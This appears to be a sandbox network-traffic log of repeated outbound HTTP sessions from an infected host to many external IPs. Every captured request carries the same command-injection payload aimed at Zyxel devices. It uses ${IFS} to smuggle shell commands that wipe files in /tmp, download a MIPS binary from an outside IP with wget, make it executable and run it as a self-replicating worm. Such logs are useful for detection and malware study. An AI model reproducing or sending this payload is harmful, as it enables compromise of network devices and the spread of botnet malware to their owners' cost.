                                                Jan 12, 2024 18:24:23.544483900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1400192.168.2.135407066.70.81.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544523001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1401192.168.2.135338868.54.172.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544562101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1402192.168.2.1346624206.11.82.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544589043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1403192.168.2.1344884137.250.7.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544647932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1404192.168.2.1336372124.20.224.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544671059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1405192.168.2.1352116100.239.38.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544712067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1406192.168.2.1347254179.217.221.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544756889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1407192.168.2.1333666177.155.0.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544784069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1408192.168.2.134041648.218.90.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544811010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1409192.168.2.1355428208.129.13.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544857979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1410192.168.2.135886825.47.176.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544899940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1411192.168.2.1355484133.146.65.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544931889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1412192.168.2.134900682.146.108.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544974089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1413192.168.2.1347690103.38.161.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.545027018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1414192.168.2.1357832218.112.247.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.545063972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1415192.168.2.134266441.66.197.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.545120001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1416192.168.2.133736079.253.183.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.549746990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1417192.168.2.1337144145.222.88.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.551477909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1418192.168.2.1336918195.120.167.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.551573038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1419192.168.2.1354186149.42.123.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552134991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1420192.168.2.1336302148.51.99.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552165985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1421192.168.2.133838496.243.175.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552264929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1422192.168.2.1350068170.29.172.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552277088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1423192.168.2.1334428187.76.66.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552321911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1424192.168.2.1339616212.48.246.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552351952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1425192.168.2.1351330190.107.48.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552388906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1426192.168.2.1342176212.6.76.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552428007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1427192.168.2.1347962156.96.240.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552467108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1428192.168.2.1347616103.225.91.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552529097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1429192.168.2.134195677.196.228.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552548885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1430192.168.2.133732640.102.220.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552584887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1431192.168.2.13376648.250.209.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552639961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1432192.168.2.1336972102.149.218.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552680969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1433192.168.2.13447005.173.191.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552717924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1434192.168.2.1345050126.214.182.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552778006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1435192.168.2.134680038.34.63.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.552798986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1436192.168.2.1356250164.107.64.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562330008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1437192.168.2.135561695.126.235.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562355042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1438192.168.2.13454944.184.133.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562387943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1439192.168.2.135358248.197.63.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562427998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1440192.168.2.1333834165.39.70.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562463045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1441192.168.2.136062474.86.140.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562485933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1442192.168.2.1358168115.122.56.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562551022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1443192.168.2.135077231.203.199.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562612057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1444192.168.2.134842048.115.126.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562649012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1445192.168.2.1356258141.58.236.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562655926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1446192.168.2.134256068.8.247.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562720060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1447192.168.2.1356764142.125.153.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562738895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1448192.168.2.134695025.75.45.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562793016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1449192.168.2.1344938125.213.17.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562818050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1450192.168.2.135039059.185.162.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562858105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1451192.168.2.1351494211.117.222.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562887907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1452192.168.2.1355952143.88.205.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562916994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1453192.168.2.1351718183.89.174.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.562968016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1454192.168.2.134739879.202.197.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563015938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1455192.168.2.134693632.109.167.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563050985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1456192.168.2.133975043.244.229.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563097954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1457192.168.2.133729687.176.217.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563141108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1458192.168.2.133959620.106.119.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563170910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1459192.168.2.1336910169.185.129.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563209057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1460192.168.2.1347360121.68.17.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563240051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1461192.168.2.1350022154.40.183.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563281059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1462192.168.2.134681219.91.141.77443
                                                TimestampBytes transferredDirectionData
